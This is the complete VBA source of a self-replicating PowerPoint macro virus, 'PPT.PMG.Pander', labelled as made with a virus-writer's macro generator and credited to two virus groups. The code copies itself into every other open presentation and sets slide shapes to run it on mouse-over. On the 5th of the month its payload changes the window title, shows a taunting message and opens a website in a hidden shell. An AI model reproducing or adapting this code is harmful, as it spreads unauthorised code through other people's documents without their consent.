'------------------------------------------------------------
'PPT.PMG.Pander
'Generated by -KD-
'Created with Powerpoint Macro Generator 1.1k
'by -KD- [Metaphase VX Team & NoMercyVirusTeam]
'5-28-00
'--------------Do not edit above this line!------------------
Sub PMG(Pander)
On Error Resume Next
Set MyPander = ActivePresentation.VBProject.VBComponents("Pander").CodeModule
ThisPander = MyPander.CountOfLines + 1: PanderFiles = MyPander.Lines(1, ThisPander)
For Each ThisPander In Presentations
If ThisPander.VBProject.VBComponents(MyPander).Name <> MyPander Then
ThisPander.VBProject.VBComponents.Add(1).Name = MyPander
ThisPander.VBProject.VBComponents(MyPander).CodeModule.InsertLines 1, PanderFiles
For Each LittlePander In ThisPander.Slides(ThisPander.Slides.Count).Shapes
If LittlePander.ActionSettings(ppMouseOver).Action = 0 Then _
LittlePander.ActionSettings(ppMouseOver).Action = ppActionRunMacro: _
LittlePander.ActionSettings(ppMouseOver).Run ="PMG"
Next: End If: Next
On Error GoTo Exit_Payload
If Day(Now()) = 05 then
Application.Caption = "Microslop PowerPoint"
Msgbox "Metaphase & NoMercy!!!", 0, "PPT.PMG.Pander"
Shell "start http://www.coderz.net/", vbHide
End If
Exit_Payload:
End Sub
